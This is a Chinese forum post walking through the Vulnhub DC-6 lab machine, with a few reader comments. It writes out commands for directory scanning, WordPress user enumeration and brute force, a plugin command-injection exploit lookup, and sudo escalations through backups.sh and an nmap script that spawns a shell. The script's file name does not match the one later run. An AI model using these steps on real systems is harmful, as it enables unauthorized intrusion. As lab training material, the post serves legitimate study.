首页
社区
课程
招聘
[原创]小蜘蛛带你一起学习DC-6
发表于: 2021-3-5 23:37 4729

[原创]小蜘蛛带你一起学习DC-6

2021-3-5 23:37
4729

Vunlnhub靶机DC-6

 

*注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。

 

目录
DC-6 靶机实战(DC-)

DC-6 靶机

信息收集

图片描述
nmap扫描结果
图片描述

查看cms

注意修改名称解析
图片描述
得知cms使用的wordpress

扫描站点

对站点进行目录扫描

1
dirb http://10.10.10.222

图片描述
扫描出登录窗口
图片描述
是一个后台登录页面

枚举站点用户

1
wpscan --url http://wordy -e u

图片描述
图片描述
将文件拷贝到dcname.txt中
使用工具截取出用户名

1
grep [+] dc6name.txt | awk '{print $2}' > dc-6-user.txt

图片描述

现在用户名有了,管理员登录后台页面也有了,那我们就可以进行暴力破解了

暴力破解

1
wpscan --url http://Wordy -U dc-6-uname -P /usr/share/wordlists/rockyou.txt

暴力破解需要很长很长的时间
图片描述
登录后台页面
图片描述
可以看到安装了activity_monitor插件
search看一下有没有漏洞
图片描述

1
searchsploit wordpress activity monitor

图片描述

1
cp /usr/share/exploitdb/exploits/php/webapps/45274.html ./

命令注入漏洞

图片描述

验证发现,存在命令注入漏洞

 

打开浏览器代理,反弹到burpsuite
图片描述
进入Repeater模块
图片描述
使用nc反向连接kali
图片描述
图片描述
查看账号信息
图片描述
这里我们拿到了一个用户和口令

提权

进入后查看当前用户可执行的操作
图片描述
发现我们可以运行jens用户下面的backups.sh

1
2
echo /bin/bash >> backups.sh
sudo -u jens ./backups.sh

执行后我们就进入到了jens用户下
图片描述
我们发现nmap拥有root执行权限

我们继续使用nmap去调用我们的脚本例如/bin/bash.
nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

 

利用过程:写入一个执行bash的nmap脚本,运行

1
2
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=/tmp/root.nse

图片描述
提权成功!


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 1634
活跃值: (480)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
域名跳转都不说,好歹说一下了。是不是dc7 就没有了?
2022-10-24 13:15
0
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
3
wasdzjh 域名跳转都不说,好歹说一下了。是不是dc7 就没有了?
好的,接下来会写专题。
2022-10-28 17:46
0
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
4

不好意思刚刚看到,自从前年毕业后由于工作原因就很少更新了。感谢抬爱!接下来会将基础部分整合到博客中(web安全基础部分,原理比较多,争取一月整理发到文章中,主要放在CTF区域大家都可以看,如果是在WEB安全区域会有一定限制;包括明年会更新(应急响应及中间件组件原理分析);后面还会有(内网渗透“涵盖点比较多些包含部分实战内容”,PHP代码审计)

最后于 2022-10-28 19:13 被安全小蜘蛛编辑 ,原因:
2022-10-28 17:59
0
雪    币: 1634
活跃值: (480)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
安全小蜘蛛 不好意思刚刚看到,自从前年毕业后由于工作原因就很少更新了。感谢抬爱!接下来会将基础部分整合到博客中(web安全基础部分,原理比较多,争取一月整理发到文章中,主要放在CTF区域大家都可以看,如果是在WE ...
dc7我都做完了,这个dc系列就到7吗 你还会写其他系列的渗透文章吗?
2022-10-31 12:06
0
雪    币: 617
活跃值: (1331)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
6
dc系列可能暂时需要告一段落了,后续其他文章都会有的,目前是打算一周一更。
2022-11-2 21:33
0
游客
登录 | 注册 方可回帖
返回
//